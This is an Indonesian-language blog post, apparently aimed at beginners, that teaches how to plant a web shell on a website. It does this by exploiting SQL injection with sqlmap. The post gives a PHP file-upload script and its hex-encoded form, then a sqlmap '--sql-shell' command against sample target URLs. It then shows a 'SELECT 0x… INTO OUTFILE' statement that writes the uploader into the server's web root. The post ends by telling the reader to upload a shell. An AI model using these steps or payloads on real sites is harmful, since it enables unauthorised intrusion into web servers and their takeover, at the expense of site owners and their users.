Sunday, July 23, 2017

Cara Upload shell Dengan Sqlmap

newbie cuma sekedar pengen sharing biar bisa sama2

tentunya agan2 sekalian udah pada tau dong sama tools yang namanya sqlmap, nih tools ajib buat sqli buat newbie kyk ane

kali ini ane mau share ilmu newbie ane hasil nyontek sana sini, ane mau share cara upload shell pake sqlmap ..

pertama kita musti punya target dulu dong tentunya,
nih contoh targetnya:
http://dewa-maho.com/tusuk.php?id=5

trus siapin script upload ente gan, disini sebagai contoh ane mau upload scrip ini nih
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

tapi sebelumnya convert dulu script diatas menjadi hex gan sebelum bisa di upload, bisa DISINI hasilnya jadi gini gan..
PHP Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d697422 ​ 2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f616465 ​ 6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e 

  1. Open terminal trus open sqlmap nya.. klo belom punya download DISINI 
  2. python sqlmap.py -u http://wewegombel.com/index.php?id=5 --sql-shell 
  3. trus kluar kira2 beginian nih
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> 
Sekarang ketik SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
jangan lupa menambahkan '0x' di depan 'HEX'
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 ​ 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 ​ 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";

tunggu dan jika beruntung akan ada pemberitahuan berhasil di upload, klo apes ya coba lagi

kalau berhasil silahkan browse file kita tadi,
http://wewegombel.com/upload.php

Trus upload dehshellnya ..oke..semoga dapat membantu
Posted by at

1 comment:

Subscribe to: Post Comments (Atom)